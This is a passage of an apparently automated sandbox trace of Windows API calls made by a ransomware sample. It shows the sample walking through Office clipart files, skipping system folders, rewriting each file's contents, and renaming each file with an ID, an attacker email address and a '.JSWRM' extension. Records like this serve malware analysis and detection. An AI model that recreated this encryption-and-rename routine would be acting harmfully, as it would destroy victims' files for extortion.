nNumberOfBytesToRead=0x51e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x51e0, lpOverlapped=0x0) returned 1 [0095.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.944] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x51e0, lpOverlapped=0x0) returned 1 [0095.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.945] CloseHandle (hObject=0x314) returned 1 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0095.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0095.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0095.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.946] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3308, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00373_.WMF", cAlternateFileName="")) returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2=".") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="..") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="...") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="windows") returned -1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="recovery") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="perflogs") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="documents and settings") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="system volume information") returned -1 [0095.946] lstrcmpiW (lpString1="SO00373_.WMF", lpString2="msocache") returned 1 [0095.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00373_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00373_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00373_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0095.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00373_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00373_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00373_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0095.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0095.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.062] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13064) returned 1 [0096.062] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3300) returned 0x24d210 [0096.062] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3300, lpOverlapped=0x0) returned 1 [0096.064] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.064] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3300, lpOverlapped=0x0) returned 1 [0096.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.064] CloseHandle (hObject=0x314) returned 1 [0096.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0096.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0096.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0096.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0096.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0096.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.065] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0096.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0096.066] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00382_.WMF", cAlternateFileName="")) returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2=".") returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="..") returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="...") returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="windows") returned -1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="recovery") returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="perflogs") returned 1 [0096.066] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="documents and settings") returned 1 [0096.067] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.067] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="system volume information") returned -1 [0096.067] lstrcmpiW (lpString1="SO00382_.WMF", lpString2="msocache") returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00382_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00382_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00382_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00382_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00382_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00382_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.068] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10228) returned 1 [0096.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27f0) returned 0x24d210 [0096.068] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27f0, lpOverlapped=0x0) returned 1 [0096.070] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.070] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27f0, lpOverlapped=0x0) returned 1 [0096.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.070] CloseHandle (hObject=0x314) returned 1 [0096.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0096.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0096.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0096.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0096.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0096.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.071] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.072] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00390_.WMF", cAlternateFileName="")) returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2=".") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="..") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="...") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="windows") returned -1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="recovery") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="perflogs") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="documents and settings") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="system volume information") returned -1 [0096.072] lstrcmpiW (lpString1="SO00390_.WMF", lpString2="msocache") returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0096.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.073] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2940) returned 1 [0096.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb70) returned 0x23fc98 [0096.073] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb70, lpOverlapped=0x0) returned 1 [0096.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.075] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb70, lpOverlapped=0x0) returned 1 [0096.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0096.075] CloseHandle (hObject=0x314) returned 1 [0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0096.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 